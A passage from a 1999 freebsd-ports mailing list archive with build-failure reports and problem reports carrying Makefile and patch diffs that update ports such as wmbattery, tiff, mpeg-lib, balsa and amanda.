Hi,all. > > Yesterday,I made install x11/gnome in 4.0-CURRENT on XFree86-3.3.5,but it > failed in games/gnomegames as follows: > > c++ -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/X11R6/include -DNEED_GNOMESUPPORT_H -I/usr/local/include/glib12 -I/usr/local/include -I/usr/X11R6/include/gtk12 -DGNOMELOCALDIR=\""/usr/X11R6/share/gnome/local"\" -I/usr/local/include -I/usr/X11R6/include/gtk12 -I/usr/local/include -I/usr/X11R6/include -I/usr/local/include/glib12 -O -pipe -c MCursor.cc > MCursor.cc: In method `void MCursor::load(const char *, int)': > MCursor.cc:12: ANSI C++ forbids implicit conversion from `void *' in argument passing > MCursor.cc:21: ANSI C++ forbids implicit conversion from `void *' in argument passing > gmake[3]: *** [MCursor.o] Error 1 > gmake[3]: Leaving directory `/usr/ports/games/gnomegames/work/gnome-games-1.0.51/xbill' > gmake[2]: *** [all-recursive] Error 1 > gmake[2]: Leaving directory `/usr/ports/games/gnomegames/work/gnome-games-1.0.51/xbill' > gmake[1]: *** [all-recursive] Error 1 > gmake[1]: Leaving directory `/usr/ports/games/gnomegames/work/gnome-games-1.0.51' > gmake: *** [all-recursive-am] Error 2 > *** Error code 2 > > Stop in /usr/ports/games/gnomegames. > *** Error code 1 > > Complete log of above session saved at > ftp://fbsd.toba-cmt.ac.jp/incoming/gnomegames.log > > Is there any suggestions? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-ports" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 21: 0:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 704) id B40E614CBE; Wed, 1 Dec 1999 21:00:55 -0800 (PST) To: vince@pele.WURLDLINK.NET, jseger@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG From: jseger@FreeBSD.ORG Subject: Re: ports/14885 Message-Id: <19991202050055.B40E614CBE@hub.freebsd.org> Date: Wed, 1 Dec 1999 21:00:55 -0800 (PST) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ports/net/pipsecd build fails State-Changed-From-To: open->closed State-Changed-By: jseger State-Changed-When: Wed Dec 1 21:00:36 PST 1999 State-Changed-Why: Committed the submitted fix, thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 1:28:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from nj.bricsnet.com (nj-1.aecinfo.com [216.22.214.18]) by hub.freebsd.org (Postfix) with ESMTP id 5EB5014E11 for ; Thu, 2 Dec 1999 01:28:30 -0800 (PST) (envelope-from mitayai@bricsnet.com) Received: from mitayai (HSE-TOR-ppp32556.sympatico.ca [209.226.121.195]) by nj.bricsnet.com (8.8.8/8.8.8) with SMTP id EAA24988 for ; Thu, 2 Dec 1999 04:26:28 -0500 (EST) (envelope-from mitayai@bricsnet.com) Reply-To: From: "Will Mitayai Keeso Rowe" To: Subject: mysql-server port build failing on 2.2.8-stable Date: Thu, 2 Dec 1999 04:28:08 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Importance: Normal Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm getting the following compiling this port on a 2.2.8-STABLE i386 system... any ideas what's up? cc -DHAVE_CONFIG_H -I. -I. -I.. -I../mit-pthreads/include -I./../include -I. ./include -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=6 4 -DDBUG_OFF -O2 -m486 -pipe -c strings.S strings.s: Assembler messages: strings.s:75: Error: no such 386 instruction: `clrl' strings.s:114: Error: no such 386 instruction: `clrb' strings.s:126: Error: no such 386 instruction: `clrl' strings.s:143: Error: no such 386 instruction: `clrl' strings.s:199: Error: no such 386 instruction: `clrb' strings.s:309: Error: no such 386 instruction: `clrb' strings.s:339: Error: no such 386 instruction: `clrb' strings.s:404: Error: Illegal .size expression *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 4:23:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from enterprise.sanyusan.se (enterprise.sanyusan.se [212.209.55.83]) by hub.freebsd.org (Postfix) with ESMTP id CCFFC14D3E for ; Thu, 2 Dec 1999 04:23:16 -0800 (PST) (envelope-from anders@enterprise.sanyusan.se) Received: (from anders@localhost) by enterprise.sanyusan.se (8.9.3/8.9.3) id NAA45340 for ports@freebsd.org; Thu, 2 Dec 1999 13:21:15 +0100 (CET) (envelope-from anders) Date: Thu, 2 Dec 1999 13:21:15 +0100 From: Anders Andersson To: ports@freebsd.org Subject: epic4 port Message-ID: <19991202132115.A45286@enterprise.sanyusan.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am the new maintainer of the irc/epic4 port. I would like to request a repo copy from epic4 to epic. Now this is possible since epic3 is gone from the ports tree and epic4 will soon become a 1.0 application. What is the procedure for this? Best regards, Anders -- Anders Andersson anders@sanyusan.se Sanyusan International AB http://www.sanyusan.se/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 8:45:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id 7478F14D2A for ; Thu, 2 Dec 1999 08:45:05 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from will@localhost) by blackdawn.com (8.9.3/8.9.3) id LAA01053; Thu, 2 Dec 1999 11:44:41 -0500 (EST) (envelope-from will) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <19991202033454E.imura@cs.titech.ac.jp> Date: Thu, 02 Dec 1999 11:44:40 -0500 (EST) From: will andrews To: "R. Imura" Subject: RE: Problem on making kdevelop 1.0beta4.1 Cc: ports@FreeBSD.ORG, mlobo@nlink.com.br, kdevelop@barney.cs.uni-potsdam.de Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 01-Dec-99 R. Imura wrote: > How about > > .if ${OSVERSION} < 400004 > BROKEN= 'because of obsoluted compiler' > .endif "obsolete", not "obsoluted". Why do it this way? We'll have to add this in for ALL the ports that are based on kde/qt USE_NEWGCC! And then when somebody _FINALLY_ decides to add it to those ports.. >> It's my understanding, of course, that R. Imura has >> done a writeup of the kdevelop port. Check the -ports archive for the link. >> See http://www.FreeBSD.ORG/search/ and search the -ports archive. > > Yes, I'm planning to import my kdevelop port. > But, it's for kde-i18n. > I know it's painful to you all changing from the normal kde to kde-i18n... You could send me yours so I can fix my "normal kde" version. :-) Or is it available on that URL you posted? -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 9: 1:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B74A814C32 for ; Thu, 2 Dec 1999 09:01:24 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA13215; Thu, 2 Dec 1999 09:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id EA8FE14D07 for ; Thu, 2 Dec 1999 08:53:14 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from root@localhost) by blackdawn.com (8.9.3/8.9.3) id LAA01499; Thu, 2 Dec 1999 11:52:50 -0500 (EST) (envelope-from will) Message-Id: <199912021652.LAA01499@blackdawn.com> Date: Thu, 2 Dec 1999 11:52:50 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15220: update port: sysutils/wmbattery; from v1.9 to v1.10 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15220 >Category: ports >Synopsis: update port: sysutils/wmbattery; from v1.9 to v1.10 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 2 09:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Tue Nov 30 10:14:31 EST 1999 root@argon.blackdawn.com:/usr/src/sys/compile/ARGON i386 >Description: Simple update of wmbattery to new version. Not much changed here. Commit ASAP to fix md5 checksum mismatch. Also added "windowmaker" pseudo-category. >How-To-Repeat: Use the diff to update the current port. >Fix: diff -urN wmbattery/Makefile wmbattery.new/Makefile --- wmbattery/Makefile Thu Oct 21 00:29:02 1999 +++ wmbattery.new/Makefile Thu Dec 2 11:49:40 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: wmbattery -# Version required: 1.9 +# Version required: 1.10 # Date created: 18 Sep 1999 # Whom: Will Andrews # @@ -7,8 +7,8 @@ # DISTNAME= wmbattery -PKGNAME= ${DISTNAME}-1.9 -CATEGORIES= sysutils +PKGNAME= ${DISTNAME}-1.10 +CATEGORIES= sysutils windowmaker MASTER_SITES= http://kitenet.net/programs/code/wmbattery/ MAINTAINER= andrews@technologist.com diff -urN wmbattery/files/md5 wmbattery.new/files/md5 --- wmbattery/files/md5 Thu Oct 21 00:29:02 1999 +++ wmbattery.new/files/md5 Thu Dec 2 11:37:44 1999 @@ -1 +1 @@ -MD5 (wmbattery.tar.gz) = e42cb129ac91d985e39744cd0a39db42 +MD5 (wmbattery.tar.gz) = 7280febb131ea3ccff1f9527eaedc3d7 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 10:12:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1522114DA5 for ; Thu, 2 Dec 1999 10:12:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA20100; Thu, 2 Dec 1999 10:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 3570614E03; Thu, 2 Dec 1999 10:03:14 -0800 (PST) Message-Id: <19991202180314.3570614E03@hub.freebsd.org> Date: Thu, 2 Dec 1999 10:03:14 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15224: Update port: graphics/tiff to 3.5.3 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15224 >Category: ports >Synopsis: Update port: graphics/tiff to 3.5.3 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 2 10:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 3.5.2 to 3.5.3 >How-To-Repeat: >Fix: diff -urN /usr/ports/graphics/tiff/Makefile graphics/tiff/Makefile --- /usr/ports/graphics/tiff/Makefile Sat Nov 27 05:37:46 1999 +++ graphics/tiff/Makefile Thu Dec 2 22:53:58 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: tiff -# Version required: 3.5.2 +# Version required: 3.5.3 # Date created: 8 October 1996 # Whom: Richard Hwang # Mikhail Teterin @@ -8,8 +8,8 @@ # $FreeBSD: ports/graphics/tiff/Makefile,v 1.21 1999/11/24 23:36:59 cpiazza Exp $ # -DISTNAME= tiff-v3.5.2 -PKGNAME= tiff-3.5.2 +DISTNAME= tiff-v3.5.3 +PKGNAME= tiff-3.5.3 CATEGORIES= graphics MASTER_SITES= ftp://ftp.onshore.com/pub/libtiff/ \ http://www.libtiff.org/ @@ -33,7 +33,6 @@ --noninteractive .if defined(NOPORTDOCS) -CONFIGURE_ARGS+= --with-HTML=no PLIST= ${PKGDIR}/PLIST.nodocs .else CONFIGURE_ARGS+= --with-HTML --with-DIR_HTML=${PREFIX}/share/doc/tiff @@ -65,10 +64,10 @@ TIFFVStripSize.3t TIFFVTileSize.3t TIFFWarning.3t \ TIFFWriteBufferSetup.3t TIFFWriteDirectory.3t TIFFWriteEncodedStrip.3t \ TIFFWriteEncodedTile.3t TIFFWriteRawStrip.3t TIFFWriteRawTile.3t \ - TIFFWriteScanline.3t TIFFbuffer.3t TIFFcodec.3t TIFFfree.3t \ - TIFFmalloc.3t TIFFmemcmp.3t TIFFmemcpy.3t TIFFmemory.3t TIFFmemset.3t \ - TIFFquery.3t TIFFrealloc.3t TIFFsize.3t TIFFstrip.3t TIFFswab.3t \ - TIFFtile.3t libtiff.3t + TIFFWriteScanline.3t TIFFWriteTile.3t TIFFbuffer.3t TIFFcodec.3t \ + TIFFfree.3t TIFFmalloc.3t TIFFmemcmp.3t TIFFmemcpy.3t TIFFmemory.3t \ + TIFFmemset.3t TIFFquery.3t TIFFrealloc.3t TIFFsize.3t TIFFstrip.3t \ + TIFFswab.3t TIFFtile.3t libtiff.3t post-install: ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib diff -urN /usr/ports/graphics/tiff/files/md5 graphics/tiff/files/md5 --- /usr/ports/graphics/tiff/files/md5 Sat Nov 27 05:37:46 1999 +++ graphics/tiff/files/md5 Thu Dec 2 22:25:14 1999 @@ -1 +1 @@ -MD5 (tiff-v3.5.2.tar.gz) = 2c498457556723485d488eb12c12fe95 +MD5 (tiff-v3.5.3.tar.gz) = d9b401aff13903a5818d7887e1f69022 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 10:12:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AA85814D2D for ; Thu, 2 Dec 1999 10:12:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA20091; Thu, 2 Dec 1999 10:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 546F614D09; Thu, 2 Dec 1999 10:02:02 -0800 (PST) Message-Id: <19991202180202.546F614D09@hub.freebsd.org> Date: Thu, 2 Dec 1999 10:02:02 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15223: Update port: audio/mpeg-lib Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15223 >Category: ports >Synopsis: Update port: audio/mpeg-lib >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 2 10:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Removed unneeded lines from Makefile * Fixed install options * Fixed pkg/PLIST >How-To-Repeat: >Fix: diff -urN /usr/ports/graphics/mpeg-lib/Makefile graphics/mpeg-lib/Makefile --- /usr/ports/graphics/mpeg-lib/Makefile Sat Nov 27 05:37:45 1999 +++ graphics/mpeg-lib/Makefile Sun Nov 28 17:24:54 1999 @@ -8,15 +8,13 @@ DISTNAME= mpeg_lib-1.3.1 CATEGORIES= graphics -MASTER_SITES= ftp://ftp.bic.mni.mcgill.ca/pub/mpeg/ +MASTER_SITES= ftp://ftp.bic.mni.mcgill.ca/pub/mpeg/ \ + http://starship.python.net/~gward/mpeglib/ MAINTAINER= ports@FreeBSD.org GNU_CONFIGURE= yes CONFIGURE_ENV= OPTIMIZE="${CFLAGS}" - -pre-install: - @${MKDIR} ${PREFIX}/bin ${PREFIX}/lib ${PREFIX}/include post-install: ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib diff -urN /usr/ports/graphics/mpeg-lib/patches/patch-aa graphics/mpeg-lib/patches/patch-aa --- /usr/ports/graphics/mpeg-lib/patches/patch-aa Sun Sep 19 21:05:47 1999 +++ graphics/mpeg-lib/patches/patch-aa Sun Nov 28 17:59:10 1999 @@ -1,6 +1,14 @@ --- Makefile.in.orig Fri Nov 27 01:03:29 1998 -+++ Makefile.in Tue Aug 31 23:11:56 1999 -@@ -26,6 +26,7 @@ ++++ Makefile.in Tue Nov 23 02:51:05 1999 +@@ -19,13 +19,14 @@ + exec_prefix = @exec_prefix@ + INSTALL_INCLUDE = @includedir@ + INSTALL_LIBRARY = @libdir@ +-INSTALL = @INSTALL@ ++INSTALL_DATA = @INSTALL_DATA@ + + # Other miscellaneous programs + AR = @AR@ ARFLAGS = -ru RANLIB = @RANLIB@ @@ -20,7 +28,7 @@ LIBRARY = libmpeg.a -SHLIB = libmpeg.so +.if ${PORTOBJFORMAT} == elf -+SHLIB = libmpeg.so.1 ++SHLIB = libmpeg.so.1 +.else +SHLIB = libmpeg.so.1.3 +.endif @@ -57,9 +65,9 @@ + ln -sf $(SHLIB) `echo $(SHLIB) | sed 's/\.so.*$$/\.so/'` + +install: -+ install -c -m 444 ${LIBRARY} ${SHLIB} ${PREFIX}/lib -+ (cd ${PREFIX}/lib; ln -sf $(SHLIB) `echo $(SHLIB) | sed 's/\.so.*$$/\.so/'`) -+ install -c -m 444 mpeg.h ${PREFIX}/include ++ $(INSTALL_DATA) $(LIBRARY) $(SHLIB) $(INSTALL_LIBRARY) ++ (cd $(INSTALL_LIBRARY); ln -sf $(SHLIB) `echo $(SHLIB) | sed 's/\.so.*$$/\.so/'`) ++ $(INSTALL_DATA) $(HEADER) $(INSTALL_INCLUDE) clean: rm -f $(LIBRARY) $(EXTRAS) $(LIBOBJ) core @@ -68,7 +76,7 @@ cd extras && $(MAKE) distclean +.c.so: -+ ${CC} ${CFLAGS} $(INCLUDE_DIRS) -fpic -DPIC -c $< -o $@ ++ $(CC) $(CFLAGS) $(INCLUDE_DIRS) -fpic -DPIC -c $< -o $@ # Executable targets (mpegtest, easympeg [GL platforms only]) diff -urN /usr/ports/graphics/mpeg-lib/pkg/PLIST graphics/mpeg-lib/pkg/PLIST --- /usr/ports/graphics/mpeg-lib/pkg/PLIST Sun Sep 19 21:05:48 1999 +++ graphics/mpeg-lib/pkg/PLIST Sun Nov 28 17:25:43 1999 @@ -1,6 +1,6 @@ +include/mpeg.h lib/libmpeg.a -lib/libmpeg.so.1.3 lib/libmpeg.so +lib/libmpeg.so.1 @exec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -m %B @unexec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -R -include/mpeg.h >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 10:12:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8955A14E07 for ; Thu, 2 Dec 1999 10:12:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA20109; Thu, 2 Dec 1999 10:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 2112014DF3; Thu, 2 Dec 1999 10:04:25 -0800 (PST) Message-Id: <19991202180425.2112014DF3@hub.freebsd.org> Date: Thu, 2 Dec 1999 10:04:25 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15225: Update port: mail/balsa Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15225 >Category: ports >Synopsis: Update port: mail/balsa >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 2 10:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed BUILD_DEPENDS line in Makefile * Fixed pkg/DESCR >How-To-Repeat: >Fix: diff -urN /usr/ports/mail/balsa/Makefile mail/balsa/Makefile --- /usr/ports/mail/balsa/Makefile Sat Nov 27 05:38:20 1999 +++ mail/balsa/Makefile Sun Nov 28 14:35:49 1999 @@ -12,7 +12,7 @@ MAINTAINER= ports@FreeBSD.org -#RUN_DEPENDS= panel:${PORTSDIR}/x11/gnomegore +RUN_DEPENDS= panel:${PORTSDIR}/x11/gnomecore LIB_DEPENDS= gnome.3:${PORTSDIR}/x11/gnomelibs \ PropList.2:${PORTSDIR}/devel/libPropList diff -urN /usr/ports/mail/balsa/pkg/DESCR mail/balsa/pkg/DESCR --- /usr/ports/mail/balsa/pkg/DESCR Mon May 3 21:53:18 1999 +++ mail/balsa/pkg/DESCR Sun Nov 28 14:37:45 1999 @@ -3,12 +3,10 @@ The pop3 support is not complete. All mail retrieved will be left on the server, and hence retrieved again if not deleted through some other pop3 -client. I would recommend using fetchmail to retrieve pop3 mail. +client. Using fetchmail would be recommended to retrieve pop3 mail. Balsa is probably not fully usable as one's primary mail client at this time. However, it is under active development and fits with other gnome applications. WWW: http://www.balsa.net/ - -The web site does not appear to be up to date. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 10:12:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E4FE814E22 for ; Thu, 2 Dec 1999 10:12:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA20118; Thu, 2 Dec 1999 10:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 019BD14D3B; Thu, 2 Dec 1999 10:05:47 -0800 (PST) Message-Id: <19991202180547.019BD14D3B@hub.freebsd.org> Date: Thu, 2 Dec 1999 10:05:47 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15226: Update port: misc/amanda Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15226 >Category: ports >Synopsis: Update port: misc/amanda >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 2 10:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Modified patches to support CC/INSTALL/PREFIX properly * Stripped binaries * Sorted pkg/PLIST Add file: patches/patch-ad patches/patch-ae patches/patch-af patches/patch-ag Remove file: patches/patch-ab scripts/configure >How-To-Repeat: >Fix: diff -urN /usr/ports/misc/amanda/Makefile misc/amanda/Makefile --- /usr/ports/misc/amanda/Makefile Wed Nov 10 21:12:28 1999 +++ misc/amanda/Makefile Fri Dec 3 01:53:16 1999 @@ -12,15 +12,38 @@ MAINTAINER= ports@FreeBSD.org -PATCH_STRIP= -MAN8= amanda.8 amadmin.8 amcheck.8 amcleanup.8 amdump.8 \ - amflush.8 amlabel.8 amrestore.8 amtape.8 +MAN8= amadmin.8 amanda.8 amcheck.8 amcleanup.8 amdump.8 amflush.8 \ + amlabel.8 amrestore.8 amtape.8 -pre-configure: - ${ECHO} "${CFLAGS}" > /tmp/build-ports-misc-amanda-cflags +LIBEXEC_BIN= amandad calcsize driver dumper getconf planner reporter \ + runtar selfcheck sendbackup-dump sendbackup-gnutar sendsize \ + taper +SBIN_BIN= amadmin amcheck amflush amlabel amrestore amtape + +post-patch: + @${LN} -sf config.h-freebsd2 ${WRKSRC}/config/config.h + @${SED} -e 's:%%CC%%:${CC}:g' \ + -e 's:%%CFLAGS%%:${CFLAGS}:g' \ + -e 's:%%INSTALL%%:${INSTALL}:g' \ + -e 's:%%PREFIX%%:${PREFIX}:g' \ + ${WRKSRC}/config/options.h-vanilla > ${WRKSRC}/config/options.h +.for file in amanda.8 amcleanup.8 amflush.8 amlabel.8 + @cd ${WRKSRC}/man/; ${MV} ${file} ${file}.in; \ + ${SED} -e 's:%%PREFIX%%:${PREFIX}:g' ${file}.in > ${file} +.endfor post-install: - ${MKDIR} ${PREFIX}/share/examples/amanda - ${CP} -R ${WRKSRC}/example/* ${PREFIX}/share/examples/amanda +.for file in ${LIBEXEC_BIN} + @if [ -f ${PREFIX}/libexec/amanda/${file} ]; then \ + strip ${PREFIX}/libexec/amanda/${file}; \ + fi +.endfor +.for file in ${SBIN_BIN} + @if [ -f ${PREFIX}/sbin/${file} ]; then \ + strip ${PREFIX}/sbin/${file}; \ + fi +.endfor + @${MKDIR} ${PREFIX}/share/examples/amanda + ${INSTALL_DATA} ${WRKSRC}/example/* ${PREFIX}/share/examples/amanda .include diff -urN /usr/ports/misc/amanda/patches/patch-ab misc/amanda/patches/patch-ab --- /usr/ports/misc/amanda/patches/patch-ab Sat Mar 8 00:00:00 1997 +++ misc/amanda/patches/patch-ab Thu Jan 1 09:00:00 1970 @@ -1,76 +0,0 @@ ---- man/amanda.8~ Sun May 19 22:11:25 1996 -+++ man/amanda.8 Fri Mar 7 22:24:28 1997 -@@ -135,19 +135,19 @@ - - All the files are stored in a - .I config --directory under /etc/amanda. Often a single site will have more than -+directory under /usr/local/etc/amanda. Often a single site will have more than - one configuration; these configurations are named by the directories - that their config files are in. For example, a site might have a - .I normal - configuration for every-day backups, and a - .I archive - configuration for 6-month full archival backups. The config files for --these two would be stored under /etc/amanda/normal and --/etc/amanda/archive, respectively. -+these two would be stored under /usr/local/etc/amanda/normal and -+/usr/local/etc/amanda/archive, respectively. - - All log and database files generated by Amanda go in corresponding --directories under /usr/adm/amanda. In our example, the logs would go --in /usr/adm/amanda/normal and /usr/adm/amanda/archive. -+directories under /var/lov/amanda. In our example, the logs would go -+in /var/log/amanda/normal and /var/log/amanda/archive. - - .SH CONFIG FILE PARAMETERS - ---- man/amcleanup.8~ Sun May 19 22:11:25 1996 -+++ man/amcleanup.8 Fri Mar 7 22:23:07 1997 -@@ -31,13 +31,13 @@ - - .PP - .nf --if [ -s /usr/adm/amanda/csd/amanda.log ] -+if [ -s /var/log/amanda/csd/amanda.log ] - then - /usr/local/sbin/amcleanup csd - fi - .fi - .RS .5i --Putting the above in /etc/rc.local runs the Amanda -+Putting the above in /usr/local/etc/rc.local runs the Amanda - cleanup process when needed as part of the reboot, eliminating the need - to run it by hand. - .RE ---- man/amflush.8~ Sun May 19 22:11:25 1996 -+++ man/amflush.8 Fri Mar 7 22:22:28 1997 -@@ -22,7 +22,7 @@ - .B Amflush - will look in the holding disk specified by the - .I amanda.conf --file in /etc/amanda/\fIconfig\fR -+file in /usr/local/etc/amanda/\fIconfig\fR - for any non-empty Amanda work directories. It then prompts the - operator to select the correct directory. The work directories on the - holding disk are named by the date at the time ---- man/amlabel.8~ Sun May 19 22:11:25 1996 -+++ man/amlabel.8 Fri Mar 7 22:22:22 1997 -@@ -11,7 +11,7 @@ - .B Amlabel - writes an Amanda label on the tape in the tape drive specified by the - .I amanda.conf --file in /etc/amanda/\fIconfig\fR. The -+file in /usr/local/etc/amanda/\fIconfig\fR. The - .I label - can be any string that does not contain whitespace, and that matches the - .I amanda.conf -@@ -26,7 +26,7 @@ - .TP - % amlabel csd VOL1 - If the line "tapedev /dev/tape/1n" is in --/etc/amanda/csd/amanda.conf, an Amanda label with the name "VOL1" is -+/usr/local/etc/amanda/csd/amanda.conf, an Amanda label with the name 